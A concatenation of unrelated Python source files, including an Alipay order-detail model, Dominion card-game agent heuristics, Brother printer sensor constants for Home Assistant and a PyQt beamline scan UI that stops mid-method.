self._settle_info = SettleInfo.from_alipay_dict(value)
@property
def show_url(self):
return self._show_url
@show_url.setter
def show_url(self, value):
self._show_url = value
@property
def sub_merchant(self):
return self._sub_merchant
@sub_merchant.setter
def sub_merchant(self, value):
if isinstance(value, SubMerchant):
self._sub_merchant = value
else:
self._sub_merchant = SubMerchant.from_alipay_dict(value)
@property
def subject(self):
return self._subject
@subject.setter
def subject(self, value):
self._subject = value
@property
def total_amount(self):
return self._total_amount
@total_amount.setter
def total_amount(self, value):
self._total_amount = value
def to_alipay_dict(self):
params = dict()
if self.app_id:
if hasattr(self.app_id, 'to_alipay_dict'):
params['app_id'] = self.app_id.to_alipay_dict()
else:
params['app_id'] = self.app_id
if self.body:
if hasattr(self.body, 'to_alipay_dict'):
params['body'] = self.body.to_alipay_dict()
else:
params['body'] = self.body
if self.extend_params:
if hasattr(self.extend_params, 'to_alipay_dict'):
params['extend_params'] = self.extend_params.to_alipay_dict()
else:
params['extend_params'] = self.extend_params
if self.goods_detail:
if isinstance(self.goods_detail, list):
for i in range(0, len(self.goods_detail)):
element = self.goods_detail[i]
if hasattr(element, 'to_alipay_dict'):
self.goods_detail[i] = element.to_alipay_dict()
if hasattr(self.goods_detail, 'to_alipay_dict'):
params['goods_detail'] = self.goods_detail.to_alipay_dict()
else:
params['goods_detail'] = self.goods_detail
if self.out_trade_no:
if hasattr(self.out_trade_no, 'to_alipay_dict'):
params['out_trade_no'] = self.out_trade_no.to_alipay_dict()
else:
params['out_trade_no'] = self.out_trade_no
if self.passback_params:
if hasattr(self.passback_params, 'to_alipay_dict'):
params['passback_params'] = self.passback_params.to_alipay_dict()
else:
params['passback_params'] = self.passback_params
if self.product_code:
if hasattr(self.product_code, 'to_alipay_dict'):
params['product_code'] = self.product_code.to_alipay_dict()
else:
params['product_code'] = self.product_code
if self.seller_id:
if hasattr(self.seller_id, 'to_alipay_dict'):
params['seller_id'] = self.seller_id.to_alipay_dict()
else:
params['seller_id'] = self.seller_id
if self.seller_logon_id:
if hasattr(self.seller_logon_id, 'to_alipay_dict'):
params['seller_logon_id'] = self.seller_logon_id.to_alipay_dict()
else:
params['seller_logon_id'] = self.seller_logon_id
if self.settle_info:
if hasattr(self.settle_info, 'to_alipay_dict'):
params['settle_info'] = self.settle_info.to_alipay_dict()
else:
params['settle_info'] = self.settle_info
if self.show_url:
if hasattr(self.show_url, 'to_alipay_dict'):
params['show_url'] = self.show_url.to_alipay_dict()
else:
params['show_url'] = self.show_url
if self.sub_merchant:
if hasattr(self.sub_merchant, 'to_alipay_dict'):
params['sub_merchant'] = self.sub_merchant.to_alipay_dict()
else:
params['sub_merchant'] = self.sub_merchant
if self.subject:
if hasattr(self.subject, 'to_alipay_dict'):
params['subject'] = self.subject.to_alipay_dict()
else:
params['subject'] = self.subject
if self.total_amount:
if hasattr(self.total_amount, 'to_alipay_dict'):
params['total_amount'] = self.total_amount.to_alipay_dict()
else:
params['total_amount'] = self.total_amount
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = OrderDetail()
if 'app_id' in d:
o.app_id = d['app_id']
if 'body' in d:
o.body = d['body']
if 'extend_params' in d:
o.extend_params = d['extend_params']
if 'goods_detail' in d:
o.goods_detail = d['goods_detail']
if 'out_trade_no' in d:
o.out_trade_no = d['out_trade_no']
if 'passback_params' in d:
o.passback_params = d['passback_params']
if 'product_code' in d:
o.product_code = d['product_code']
if 'seller_id' in d:
o.seller_id = d['seller_id']
if 'seller_logon_id' in d:
o.seller_logon_id = d['seller_logon_id']
if 'settle_info' in d:
o.settle_info = d['settle_info']
if 'show_url' in d:
o.show_url = d['show_url']
if 'sub_merchant' in d:
o.sub_merchant = d['sub_merchant']
if 'subject' in d:
o.subject = d['subject']
if 'total_amount' in d:
o.total_amount = d['total_amount']
return o
| StarcoderdataPython |
366406 | import string
import numpy
import copy
from domrl.engine.agent import Agent
"""
class Agent(object):
def choose(self, decision, state):
return decision.moves[0]
class StdinAgent(Agent):
def choose(self, decision, state):
# Autoplay
if len(decision.moves) == 1:
return [0]
player = decision.player
print(f" ==== Decision to be made by {player} ==== ")
print(f"Actions: {player.actions} | Buys: {player.buys} | Coins: {player.coins}")
print("Hand: ", list(map(str, player.hand)))
print(decision.prompt)
for idx, move in enumerate(decision.moves):
print(f"{idx}: {move}")
# Get user input and process it.
while True:
user_input = input()
if user_input == "?":
state.event_log.print(player)
print(state)
else:
try:
ans = list(map(lambda x: int(x.strip()), user_input.split(',')))
except:
print('Clearly invalid input. Please try again.')
continue
break
return ans
class APIAgent(Agent):
def choose(self, decision, state):
# Autoplay
# if len(decision.moves) == 1:
# return [0]
player = decision.player
actions = player.actions
buys = player.buys
coins = player.coins
moves = decision.moves
hand = player.hand
state
while True:
user_input = input()
if user_input == "?":
state.event_log.print(player)
print(state)
else:
ans = list(map(lambda x: int(x.strip()), user_input.split(',')))
break
return ans
"""
class RandomAgent(Agent):
def policy(self, decision, state):
if 'Trash up to 4' in decision.prompt: # for chapel
my_list = []
range_max = numpy.random.randint(0, min(len(decision.moves), 4) + 1, 1, int)
for idx in range(0, range_max[0]):
new_item = -1
while new_item == -1 or new_item in my_list:
new_item = numpy.random.randint(0, len(decision.moves), 1, int)[0]
my_list.append(new_item)
return my_list
if len(decision.moves) == 0:
return []
if 'Discard down to 3 cards' in decision.prompt: # for militia
my_list = []
range_max = max(len(decision.player.hand) - 3, 0)
for idx in range(0, range_max):
new_item = -1
while new_item == -1 or new_item in my_list:
new_item = numpy.random.randint(0, len(decision.moves), 1, int)[0]
my_list.append(new_item)
return my_list
value = list(numpy.random.randint(0, len(decision.moves), 1, int))
return value
class PassOnBuySemiAgent(Agent):
def policy(self, decision, state):
if 'Buy' in decision.prompt:
return [0]
class CleverAgentOld(Agent):
def __init__(self, agent):
self.agent = agent
def policy(self, decision, state):
initialDecision = copy.deepcopy(decision)
# Automove If One Move
if len(decision.moves) == 1:
return [0]
for idx in range(0, len(initialDecision.moves)):
move = initialDecision.moves[idx]
if "Buy: Curse" in move.__str__():
decision.moves.pop(idx)
if hasattr(move, "card") and (
move.card.add_actions > 0 or ("treasure" in decision.prompt.lower() and move.card.coins > 0)):
return self.restrictDecision(decision.moves, initialDecision.moves, idx)
restrictedChoice = self.agent.policy(decision, state)
return self.restrictDecision(decision.moves, initialDecision.moves, restrictedChoice[0])
def restrictDecision(self, moves, initialMoves, chosen):
for idx in range(0, len(initialMoves)):
if str(initialMoves[idx]) == str(moves[chosen]):
return list([idx])
return [chosen]
class RulesSemiAgent(Agent):
def policy(self, decision, state):
# Automove If One Move
if len(decision.moves) == 1:
return [0]
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if "Bandit" in str(move): # currently does not work
decision.moves.pop(idx)
if "Remodel" in str(move): # currently does not work
decision.moves.pop(idx)
class CleverSemiAgent(Agent):
def policy(self, decision, state):
# Automove If One Move
if len(decision.moves) == 1:
return [0]
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if "Buy: Curse" in move.__str__():
decision.moves.pop(idx)
if hasattr(move, "card") and (
move.card.add_actions > 0 or ("treasure" in decision.prompt.lower() and move.card.coins > 0)):
return [idx]
class ApplySemiAgent(Agent):
def __init__(self, semiAgents, agent):
self.semiAgents = semiAgents
self.agent = agent
def policy(self, decision, state):
for semiAgent in self.semiAgents:
value = semiAgent.policy(decision, state)
if value is not None:
return value
return self.agent.policy(decision, state)
class BigMoneySemiAgent(Agent):
def policy(self, decision, state):
for stringDesired in ["Buy: Province", "Buy: Gold", "Buy: Silver"]:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if stringDesired in move.__str__():
return [idx]
class SmithySemiAgent(Agent):
def policy(self, decision, state):
for stringDesired in ["Play: Smithy"]:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if stringDesired in move.__str__():
return [idx]
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if "Buy: Smithy" in move.__str__() and (
sum(1 for c in decision.player.all_cards if 'Smithy' in str(c)) / len(
decision.player.all_cards) < 0.1):
return [idx]
class DontBuyCopperOrEstateSemiAgent(Agent):
def policy(self, decision, state):
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if 'Buy: Copper' in str(move) or 'Buy: Estate' in str(move):
decision.moves.pop(idx)
class MyHeuristicSemiAgent(Agent):
def policy(self, decision, state):
for stringDesired in []:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if stringDesired in move.__str__():
return [idx]
if 'Action' in decision.prompt:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if 'Militia' in str(move) or 'Smithy' in str(move):
return [idx]
if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt:
return
desired_deck = {'Festival': 1, 'Market': 1, 'Militia': 1, 'Smithy': 0.1, 'Village': 0.2}
if numpy.random.randint(0, 2, 1, int) == 1:
desired_deck = {'Market': 1, 'Festival': 1, 'Smithy': 0.1, 'Militia': 1, 'Village': 0.2}
for wish in desired_deck:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if wish in str(move) and (
sum(1 for c in decision.player.all_cards if wish in str(c)) / len(
decision.player.all_cards) < desired_deck[wish]):
return [idx]
class MarketSemiAgent(Agent):
def policy(self, decision, state):
if 'Action' in decision.prompt:
for stringDesired in ['Empty']:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if 'Militia' in str(move):
return [idx]
if 'Smithy' in str(move) and decision.player.actions > 1:
return [idx]
if stringDesired in str(move):
return [idx]
if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt:
return
desired_deck = {'Market': 1, 'Militia': 0.001, 'Smithy': 0.001, 'Village': 0.2}
for wish in desired_deck:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if wish in str(move):
if sum(1 for c in decision.player.all_cards if wish in str(c)) / len(
decision.player.all_cards) < desired_deck[wish]:
return [idx]
class CustomHeuristicsSemiAgent(Agent):
def __init__(self, desired_decks):
self.desired_deck = desired_decks
def policy(self, decision, state):
if 'Action' in decision.prompt:
for stringDesired in ['Empty']:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if 'Militia' in str(move):
return [idx]
if 'Smithy' in str(move) and decision.player.actions > 1:
return [idx]
if stringDesired in str(move):
return [idx]
if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt:
return
for wish in self.desired_deck:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if wish in str(move):
if sum(1 for c in decision.player.all_cards if wish in str(c)) / len(
decision.player.all_cards) < self.desired_deck[wish]:
return [idx]
class MarketNoSmithySemiAgent(Agent):
def policy(self, decision, state):
if 'Action' in decision.prompt:
for stringDesired in ['Empty']:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if 'Militia' in str(move):
return [idx]
if 'Smithy' in str(move) and decision.player.actions > 1:
return [idx]
if stringDesired in str(move):
return [idx]
if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt:
return
desired_deck = {'Market': 1, 'Militia': 0.1, 'Village': 0.2}
for wish in desired_deck:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if wish in str(move):
if sum(1 for c in decision.player.all_cards if wish in str(c)) / len(
decision.player.all_cards) < desired_deck[wish]:
return [idx]
class MarketNoSmithySemiAgent2(Agent):
def policy(self, decision, state):
if 'Action' in decision.prompt:
for stringDesired in ['Empty']:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if 'Militia' in str(move):
return [idx]
if 'Smithy' in str(move) and decision.player.actions > 1:
return [idx]
if stringDesired in str(move):
return [idx]
if 'Buy' not in decision.prompt and 'Choose a pile to gain card from.' not in decision.prompt:
return
desired_deck = {'Market': 1, 'Militia': 0.2, 'Village': 0.2}
for wish in desired_deck:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if wish in str(move):
if sum(1 for c in decision.player.all_cards if wish in str(c)) / len(
decision.player.all_cards) < desired_deck[wish]:
return [idx]
class OnlyBuyCopperIfSemiAgent(Agent):
def policy(self, decision, state):
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if "Buy: Copper" in str(move):
if sum(c.coins for c in decision.player.all_cards) < 5:
return [idx]
else:
decision.moves.pop(idx)
class ChapelSemiAgent(Agent):
def policy(self, decision, state):
if 'Action' in decision.prompt:
for c in decision.player.hand:
if 'Estate' in str(c):
for idx in range(0, len(decision.moves)):
if 'Play: Chapel' in str(decision.moves[idx]):
return [idx]
if 'Trash up to 4' in decision.prompt:
moves = []
for idx in range(0, len(decision.moves)):
if len(moves) >= 4:
break
try:
move = decision.moves[idx]
except:
break
if "Choose: Estate" in move.__str__():
moves.append(idx)
for idx in range(0, len(decision.moves)):
if len(moves) >= 4:
break
try:
move = decision.moves[idx]
except:
break
if "Choose: Copper" in move.__str__() and (
sum(c.coins for c in decision.player.all_cards) -
sum(1 for planned_move in moves if 'Copper' in str(planned_move)) > 5):
moves.append(idx)
return moves
if 'Buy' in decision.prompt:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if 'Buy: Chapel' in str(move) and decision.player.coins < 4 and (
sum(1 for c in decision.player.all_cards if 'Chapel' in str(c)) == 0):
return [idx]
class AggressiveChapelSemiAgent(ChapelSemiAgent):
def policy(self, decision, state):
if 'Action' in decision.prompt:
for c in decision.player.hand:
if 'Estate' in str(c) or ('Copper' in str(c) and sum(c.coins for c in decision.player.all_cards) > 5):
for idx in range(0, len(decision.moves)):
if 'Play: Chapel' in str(decision.moves[idx]):
return [idx]
if 'Trash' in decision.prompt:
moves = []
for idx in range(0, len(decision.moves)):
if len(moves) >= 4:
break
try:
move = decision.moves[idx]
except:
break
if "Choose: Estate" in str(move):
moves.append(idx)
for idx in range(0, len(decision.moves)):
if len(moves) >= 4:
break
try:
move = decision.moves[idx]
except:
break
if "Choose: Copper" in str(move) and (
sum(c.coins for c in decision.player.all_cards) -
sum(1 for planned_move in moves if 'Copper' in str(decision.moves[planned_move])) > 5):
moves.append(idx)
return moves
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if "Buy: Chapel" in str(move) and (sum(1 for c in decision.player.all_cards if 'Chapel' in str(c)) > 0):
decision.moves.pop(idx)
if "Buy: Chapel" in str(move) and decision.player.coins < 4 and (
sum(1 for c in decision.player.all_cards if 'Chapel' in str(c)) == 0):
return [idx]
class ProvinceSemiAgent(Agent):
def policy(self, decision, state):
for stringDesired in ["Buy: Province"]:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if stringDesired in move.__str__():
return [idx]
class ProvinceNeverLoseSemiAgent(Agent):
def policy(self, decision, state):
desired_strings = ["Buy: Province"]
if (state.supply_piles['Province'].qty == 1 and
(6 + decision.player.total_vp() <
max(state.other_players, key=lambda pr: pr.total_vp()).total_vp())):
desired_strings = ["Buy: Duchy"]
for stringDesired in desired_strings:
for idx in range(0, len(decision.moves)):
try:
move = decision.moves[idx]
except:
break
if stringDesired in str(move):
return [idx]
| StarcoderdataPython |
4929424 | <reponame>pymt-lab/pymt_prms_soil<filename>pymt_prms_soil/__init__.py<gh_stars>0
#! /usr/bin/env python
import pkg_resources
__version__ = pkg_resources.get_distribution("pymt_prms_soil").version
from .bmi import PRMSSoil
__all__ = [
"PRMSSoil",
]
| StarcoderdataPython |
6626851 | <reponame>tbarbette/core<filename>homeassistant/components/brother/const.py<gh_stars>1-10
"""Constants for Brother integration."""
from homeassistant.const import ATTR_ICON, PERCENTAGE
ATTR_BELT_UNIT_REMAINING_LIFE = "belt_unit_remaining_life"
ATTR_BLACK_DRUM_COUNTER = "black_drum_counter"
ATTR_BLACK_DRUM_REMAINING_LIFE = "black_drum_remaining_life"
ATTR_BLACK_DRUM_REMAINING_PAGES = "black_drum_remaining_pages"
ATTR_BLACK_INK_REMAINING = "black_ink_remaining"
ATTR_BLACK_TONER_REMAINING = "black_toner_remaining"
ATTR_BW_COUNTER = "b/w_counter"
ATTR_COLOR_COUNTER = "color_counter"
ATTR_CYAN_DRUM_COUNTER = "cyan_drum_counter"
ATTR_CYAN_DRUM_REMAINING_LIFE = "cyan_drum_remaining_life"
ATTR_CYAN_DRUM_REMAINING_PAGES = "cyan_drum_remaining_pages"
ATTR_CYAN_INK_REMAINING = "cyan_ink_remaining"
ATTR_CYAN_TONER_REMAINING = "cyan_toner_remaining"
ATTR_DRUM_COUNTER = "drum_counter"
ATTR_DRUM_REMAINING_LIFE = "drum_remaining_life"
ATTR_DRUM_REMAINING_PAGES = "drum_remaining_pages"
ATTR_DUPLEX_COUNTER = "duplex_unit_pages_counter"
ATTR_ENABLED = "enabled"
ATTR_FUSER_REMAINING_LIFE = "fuser_remaining_life"
ATTR_LABEL = "label"
ATTR_LASER_REMAINING_LIFE = "laser_remaining_life"
ATTR_MAGENTA_DRUM_COUNTER = "magenta_drum_counter"
ATTR_MAGENTA_DRUM_REMAINING_LIFE = "magenta_drum_remaining_life"
ATTR_MAGENTA_DRUM_REMAINING_PAGES = "magenta_drum_remaining_pages"
ATTR_MAGENTA_INK_REMAINING = "magenta_ink_remaining"
ATTR_MAGENTA_TONER_REMAINING = "magenta_toner_remaining"
ATTR_MANUFACTURER = "Brother"
ATTR_PAGE_COUNTER = "page_counter"
ATTR_PF_KIT_1_REMAINING_LIFE = "pf_kit_1_remaining_life"
ATTR_PF_KIT_MP_REMAINING_LIFE = "pf_kit_mp_remaining_life"
ATTR_STATUS = "status"
ATTR_UNIT = "unit"
ATTR_UPTIME = "uptime"
ATTR_YELLOW_DRUM_COUNTER = "yellow_drum_counter"
ATTR_YELLOW_DRUM_REMAINING_LIFE = "yellow_drum_remaining_life"
ATTR_YELLOW_DRUM_REMAINING_PAGES = "yellow_drum_remaining_pages"
ATTR_YELLOW_INK_REMAINING = "yellow_ink_remaining"
ATTR_YELLOW_TONER_REMAINING = "yellow_toner_remaining"
DATA_CONFIG_ENTRY = "config_entry"
DOMAIN = "brother"
UNIT_PAGES = "p"
PRINTER_TYPES = ["laser", "ink"]
SNMP = "snmp"
SENSOR_TYPES = {
ATTR_STATUS: {
ATTR_ICON: "mdi:printer",
ATTR_LABEL: ATTR_STATUS.title(),
ATTR_UNIT: None,
ATTR_ENABLED: True,
},
ATTR_PAGE_COUNTER: {
ATTR_ICON: "mdi:file-document-outline",
ATTR_LABEL: ATTR_PAGE_COUNTER.replace("_", " ").title(),
ATTR_UNIT: UNIT_PAGES,
ATTR_ENABLED: True,
},
ATTR_BW_COUNTER: {
ATTR_ICON: "mdi:file-document-outline",
ATTR_LABEL: ATTR_BW_COUNTER.replace("_", " ").title(),
ATTR_UNIT: UNIT_PAGES,
ATTR_ENABLED: True,
},
ATTR_COLOR_COUNTER: {
ATTR_ICON: "mdi:file-document-outline",
ATTR_LABEL: ATTR_COLOR_COUNTER.replace("_", " ").title(),
ATTR_UNIT: UNIT_PAGES,
ATTR_ENABLED: True,
},
ATTR_DUPLEX_COUNTER: {
ATTR_ICON: "mdi:file-document-outline",
ATTR_LABEL: ATTR_DUPLEX_COUNTER.replace("_", " ").title(),
ATTR_UNIT: UNIT_PAGES,
ATTR_ENABLED: True,
},
ATTR_DRUM_REMAINING_LIFE: {
ATTR_ICON: "mdi:chart-donut",
ATTR_LABEL: ATTR_DRUM_REMAINING_LIFE.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_BLACK_DRUM_REMAINING_LIFE: {
ATTR_ICON: "mdi:chart-donut",
ATTR_LABEL: ATTR_BLACK_DRUM_REMAINING_LIFE.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_CYAN_DRUM_REMAINING_LIFE: {
ATTR_ICON: "mdi:chart-donut",
ATTR_LABEL: ATTR_CYAN_DRUM_REMAINING_LIFE.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_MAGENTA_DRUM_REMAINING_LIFE: {
ATTR_ICON: "mdi:chart-donut",
ATTR_LABEL: ATTR_MAGENTA_DRUM_REMAINING_LIFE.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_YELLOW_DRUM_REMAINING_LIFE: {
ATTR_ICON: "mdi:chart-donut",
ATTR_LABEL: ATTR_YELLOW_DRUM_REMAINING_LIFE.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_BELT_UNIT_REMAINING_LIFE: {
ATTR_ICON: "mdi:current-ac",
ATTR_LABEL: ATTR_BELT_UNIT_REMAINING_LIFE.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_FUSER_REMAINING_LIFE: {
ATTR_ICON: "mdi:water-outline",
ATTR_LABEL: ATTR_FUSER_REMAINING_LIFE.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_LASER_REMAINING_LIFE: {
ATTR_ICON: "mdi:spotlight-beam",
ATTR_LABEL: ATTR_LASER_REMAINING_LIFE.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_PF_KIT_1_REMAINING_LIFE: {
ATTR_ICON: "mdi:printer-3d",
ATTR_LABEL: ATTR_PF_KIT_1_REMAINING_LIFE.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_PF_KIT_MP_REMAINING_LIFE: {
ATTR_ICON: "mdi:printer-3d",
ATTR_LABEL: ATTR_PF_KIT_MP_REMAINING_LIFE.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_BLACK_TONER_REMAINING: {
ATTR_ICON: "mdi:printer-3d-nozzle",
ATTR_LABEL: ATTR_BLACK_TONER_REMAINING.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_CYAN_TONER_REMAINING: {
ATTR_ICON: "mdi:printer-3d-nozzle",
ATTR_LABEL: ATTR_CYAN_TONER_REMAINING.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_MAGENTA_TONER_REMAINING: {
ATTR_ICON: "mdi:printer-3d-nozzle",
ATTR_LABEL: ATTR_MAGENTA_TONER_REMAINING.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_YELLOW_TONER_REMAINING: {
ATTR_ICON: "mdi:printer-3d-nozzle",
ATTR_LABEL: ATTR_YELLOW_TONER_REMAINING.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_BLACK_INK_REMAINING: {
ATTR_ICON: "mdi:printer-3d-nozzle",
ATTR_LABEL: ATTR_BLACK_INK_REMAINING.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_CYAN_INK_REMAINING: {
ATTR_ICON: "mdi:printer-3d-nozzle",
ATTR_LABEL: ATTR_CYAN_INK_REMAINING.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_MAGENTA_INK_REMAINING: {
ATTR_ICON: "mdi:printer-3d-nozzle",
ATTR_LABEL: ATTR_MAGENTA_INK_REMAINING.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_YELLOW_INK_REMAINING: {
ATTR_ICON: "mdi:printer-3d-nozzle",
ATTR_LABEL: ATTR_YELLOW_INK_REMAINING.replace("_", " ").title(),
ATTR_UNIT: PERCENTAGE,
ATTR_ENABLED: True,
},
ATTR_UPTIME: {
ATTR_ICON: None,
ATTR_LABEL: ATTR_UPTIME.title(),
ATTR_UNIT: None,
ATTR_ENABLED: False,
},
}
| StarcoderdataPython |
3210946 | from typing import TYPE_CHECKING, List, Optional
if TYPE_CHECKING:
from projectreport.analyzer.project import Project
from projectreport.analyzer.parsers.base import Parser
import os
from cached_property import cached_property
from projectreport.analyzer.analysis import ModuleAnalysis
from projectreport.analyzer.analyzable import Analyzable
from projectreport.analyzer.parsers.index import PARSER_EXTENSIONS
class Module(Analyzable):
def __init__(
self,
path: str,
package: Optional[str] = None,
project: Optional["Project"] = None,
):
base_path, extension = os.path.splitext(path)
self.name = os.path.basename(base_path)
self.extension = extension.strip(".")
if package is None:
package = self.name
self.package = package
super().__init__(path, project=project)
self.analysis = ModuleAnalysis(self)
@cached_property
def parser(self) -> Optional["Parser"]:
if self.extension not in PARSER_EXTENSIONS:
return None
return PARSER_EXTENSIONS[self.extension](self.path)
| StarcoderdataPython |
240096 | import datetime
from timeit import default_timer as timer
import numpy as np
import pkg_resources
from PyQt5 import uic, QtCore
from matplotlib.backends.backend_qt5agg import (
FigureCanvasQTAgg as FigureCanvas,
NavigationToolbar2QT as NavigationToolbar)
from matplotlib.figure import Figure
from xas.xray import generate_energy_grid
from isstools.dialogs.BasicDialogs import question_message_box, message_box
from isstools.elements.figure_update import update_figure
from isstools.elements.parameter_handler import parse_plan_parameters, return_parameters_from_widget
from isstools.widgets import widget_energy_selector
from bluesky.callbacks import LivePlot
from ..elements.liveplots import XASPlot#, XASPlotX
ui_path = pkg_resources.resource_filename('isstools', 'ui/ui_run.ui')
class UIRun(*uic.loadUiType(ui_path)):
def __init__(self,
plan_funcs=None,
aux_plan_funcs=None,
RE=None,
db=None,
hhm=None,
detector_dict=None,
shutter_dict=None,
motor_dict=None,
apb=None,
parent=None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.setupUi(self)
self.addCanvas()
# TODO : remove hhm dependency
self.plan_funcs = plan_funcs
self.plan_funcs_names = plan_funcs.keys()
self.aux_plan_funcs = aux_plan_funcs
self.RE = RE
self.db = db
self.hhm=hhm,
self.detector_dict = detector_dict
self.shutter_dictionary = shutter_dict
self.motor_dictionary = motor_dict
self.apb = apb
self.parent = parent
self.comboBox_scan_type.addItems(self.plan_funcs_names)
self.comboBox_scan_type.currentIndexChanged.connect(self.populate_parameter_grid)
self.push_run_scan.clicked.connect(self.run_scan)
self.push_run_test_scan.clicked.connect(self.run_test_scan)
# List with uids of scans created in the "run" mode:
self.run_mode_uids = []
self.rr_token = None
self.parameter_values = []
self.parameter_descriptions = []
self.populate_parameter_grid(0)
self.widget_energy_selector = widget_energy_selector.UIEnergySelector()
self.layout_energy_selector.addWidget(self.widget_energy_selector)
self.push_info_from_autopilot.clicked.connect(self.get_info_from_autopilot)
self.energy_grid = []
## Persistance of parameters:
self.settings = parent.settings
self.widget_energy_selector.comboBox_element.setCurrentIndex(self.settings.value('step_element_index', defaultValue=0, type=int)) #
self.widget_energy_selector.comboBox_edge.setCurrentIndex(self.settings.value('step_edge_index', defaultValue=0, type=int)) #
self.edit_preedge_spacing.setText(self.settings.value('step_preedge_spacing', defaultValue='10', type=str)) #
self.edit_xanes_spacing.setText(self.settings.value('step_xanes_spacing', defaultValue='10', type=str)) #
self.edit_exafs_spacing.setText(self.settings.value('step_exafs_spacing', defaultValue='1', type=str)) #
self.edit_preedge_start.setText(self.settings.value('step_preedge_start', defaultValue='-100', type=str)) #
self.edit_xanes_start.setText(self.settings.value('step_xanes_start', defaultValue='-30', type=str)) #
self.edit_xanes_end.setText(self.settings.value('step_xanes_end', defaultValue='30', type=str)) #
self.edit_exafs_end.setText(self.settings.value('step_exafs_end', defaultValue='6', type=str)) #
self.edit_preedge_dwell.setText(self.settings.value('step_preedge_dwell', defaultValue='1', type=str)) #
self.edit_xanes_dwell.setText(self.settings.value('step_xanes_dwell', defaultValue='1', type=str))
self.edit_exafs_dwell.setText(self.settings.value('step_exafs_dwell', defaultValue='1', type=str))
self.comboBox_exafs_dwell_kpower.setCurrentIndex(self.settings.value('step_exafs_dwell_kpower_index', defaultValue=0, type=int))
## connect energy_selector layout
self.widget_energy_selector.edit_E0.textChanged.connect(self.update_E0)
self.widget_energy_selector.comboBox_edge.currentTextChanged.connect(self.update_edge)
self.widget_energy_selector.comboBox_element.currentTextChanged.connect(self.update_element)
self.element = self.widget_energy_selector.comboBox_element.currentText()
self.edge = self.widget_energy_selector.comboBox_edge.currentText()
self.e0 = self.widget_energy_selector.edit_E0.text()
def _save_step_scan_settings(self):
step_element_index = self.widget_energy_selector.comboBox_element.currentIndex()
self.settings.setValue('step_element_index', step_element_index)
step_edge_index = self.widget_energy_selector.comboBox_edge.currentIndex()
self.settings.setValue('step_edge_index', step_edge_index)
step_preedge_spacing = self.edit_preedge_spacing.text()
self.settings.setValue('step_preedge_spacing', step_preedge_spacing)
step_xanes_spacing = self.edit_xanes_spacing.text()
self.settings.setValue('step_xanes_spacing', step_xanes_spacing)
step_exafs_spacing = self.edit_exafs_spacing.text()
self.settings.setValue('step_exafs_spacing', step_exafs_spacing)
step_preedge_start = self.edit_preedge_start.text()
self.settings.setValue('step_preedge_start', step_preedge_start)
step_xanes_start = self.edit_xanes_start.text()
self.settings.setValue('step_xanes_start', step_xanes_start)
step_xanes_end = self.edit_xanes_end.text()
self.settings.setValue('step_xanes_end', step_xanes_end)
step_exafs_end = self.edit_exafs_end.text()
self.settings.setValue('step_exafs_end', step_exafs_end)
step_preedge_dwell = self.edit_preedge_dwell.text()
self.settings.setValue('step_preedge_dwell', step_preedge_dwell)
step_xanes_dwell = self.edit_xanes_dwell.text()
